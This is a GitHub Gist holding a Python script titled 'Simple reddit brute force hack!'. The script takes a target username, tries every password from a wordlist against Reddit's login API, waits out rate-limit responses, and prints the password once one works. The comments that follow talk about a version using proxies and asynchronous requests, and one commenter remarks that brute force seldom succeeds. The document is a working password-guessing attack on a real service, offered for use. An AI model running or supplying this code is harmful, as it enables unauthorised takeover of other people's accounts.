Created
December 6, 2017 18:34
-
-
Save antony-jr/ebf629281b18f8c88959fb2cf677422e to your computer and use it in GitHub Desktop.
Simple reddit brute force hack!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import sys,os | |
| import time | |
| username = "YOUR_USERNAME" | |
| password_list = "PASSWORD_LIST" | |
| login_try = { | |
| "op" : "login", | |
| "dest" : "https://www.reddit.com", | |
| "user" : username, | |
| "passwd" : "dummy_trail", | |
| "api_type" : "json" | |
| } | |
| bot = requests.Session() | |
| bot.headers.update( | |
| { | |
| 'Connection': 'close', # make sure requests closes the sockets instead of keep-alive! | |
| 'Accept': '*/*', | |
| 'Accept-Language': 'en-US', | |
| 'User-Agent': "Firefox 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)" | |
| } | |
| ) | |
| with open(password_list, encoding='utf-8', errors='ignore') as f: | |
| for line in f: | |
| login_try['passwd'] = line.rstrip() | |
| print("Trying... {}".format(line.rstrip())) | |
| resp = bot.post("https://www.reddit.com/api/login/{}".format(username) , data = login_try) | |
| print("Response::") | |
| try: | |
| json_data = resp.json() | |
| print(json_data) | |
| if len(json_data['json']['errors']) == 0: | |
| print("Password: {}".format(line.rstrip())) | |
| sys.exit(0) | |
| else: | |
| print("CAUGHT ERROR: {}".format(json_data['json']['errors'][0][0])) | |
| if json_data['json']['errors'][0][0] == "RATELIMIT": | |
| print("Waiting... ") | |
| time.sleep(int(json_data['json']['ratelimit'])) | |
| except: | |
| sys.exit(-1) |
@cuj Here is an implementation with proxies and async requests: https://youtu.be/O0DkieZjClI - will clean up and post the code soon
@cuj Here is an implementation with proxies and async requests: https://youtu.be/O0DkieZjClI - will clean up and post the code soon
Thanks for telling me, I hope the code will be published to github, I really like the code!
@cuj Here is an implementation with proxies and async requests: https://youtu.be/O0DkieZjClI - will clean up and post the code soon
Thanks for telling me, I hope the code will be published to github, I really like the code!
No worries.. posted!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@cuj It's a very simple script and brute force does not work most of the time. If you want you can add it, it's not very complicated, I just don't see this very useful as a way to crack reddit users.
TLDR; It's not worth the time to perfect a brute force attack.